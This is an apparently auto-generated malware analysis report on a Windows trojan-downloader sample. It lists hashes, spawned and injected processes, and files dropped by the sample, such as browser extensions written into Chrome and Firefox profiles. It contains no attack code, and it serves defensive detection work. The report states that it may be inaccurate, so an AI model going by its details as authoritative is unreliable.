Gen.Variant.Razy.150085_cc1257ab71

by malwarelabrobot on August 31st, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.Adload.pzpd (Kaspersky), Gen:Variant.Razy.150085 (B) (Emsisoft), Gen:Variant.Razy.150085 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: cc1257ab71774624b730464a2b2db389
SHA1: c57e755cd8744acab695c2927878b9d2a05b8ec1
SHA256: a9b032075ffc990a9e646b438865e61371e1f1ab96a3013fc6f8cab469b9cb01
SSDeep: 3072:saO0M9P8llqTIU Afah9M/2 VPH4ID5XPzCTJGpKg8IHQago8KHgCU4rR1vWsFhh:ib9P8llMIU Ac9DTJG4IHQQ59LtdnfT
Size: 218624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 14:51:43
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

brastub6ab_amobl_inst.exe:3884
csc.exe:1780
csc.exe:1992
csc.exe:3712
setup.4.15.f.exe:2796
enjoyWIFI.exe:2704
cvtres.exe:2872
cvtres.exe:1692
cvtres.exe:948
adv_334.exe:3644
adv_334.exe:1504
schtasks.exe:1084
schtasks.exe:3636
schtasks.exe:3944
schtasks.exe:1720
Setup.exe:2448
Setup.exe:4028
starter.exe:3588
ytab_m_1_big.exe:3664
ytab_m_1_big.exe:2980

The Trojan injects its code into the following process(es):

%original file name%.exe:1796
sdfCF40.exe:2912
Explorer.EXE:1440

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process brastub6ab_amobl_inst.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\s4[1].ashx (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_del.bat (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\p[1].ashx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (0 bytes)

The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe (54468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe (34372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\d44724a9212341309f18eefcfdd9b06c\setup.exe (407464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe (240166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\b6142ece028a474c9d04d9344fbbe359\ytab_m_1_big.exe (252126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\193351eab5ff42369b2ed8f5929eb197\Setup.exe (80632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe (218030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (5572 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (0 bytes)

The process csc.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (3662 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (0 bytes)

The process csc.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (2490 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (0 bytes)

The process csc.exe:3712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (4304 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (0 bytes)

The process setup.4.15.f.exe:2796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (29506 bytes)
%Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
%Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (23 bytes)
%Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
%Program Files%\EnjoyWiFi\inst.db (5 bytes)
C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
%Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
%Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
%Program Files%\EnjoyWiFi\zlib.dll (925 bytes)

The Trojan deletes the following file(s):

%Program Files%\EnjoyWiFi\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssBE7E.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x86 (0 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (0 bytes)

The process enjoyWIFI.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (0 bytes)

The process cvtres.exe:2872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (3666 bytes)

The process cvtres.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (3666 bytes)

The process cvtres.exe:948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (3666 bytes)

The process adv_334.exe:3644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon48.png (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (15861 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\computed_hashes.json (30 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\da\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\no\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\kn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sk\messages.json (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (325 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_CN\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\gu\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon16.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sw\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sv\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ja\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\be\messages.json (204 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\verified_contents.json (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ml\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\et\messages.json (127 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\th\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\am\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (876 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Content.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fi\messages.json (133 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon128.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ta\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\id\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ca\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Kernel.js (46 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\manifest.json (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\main.css (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ro\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fr\messages.json (190 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
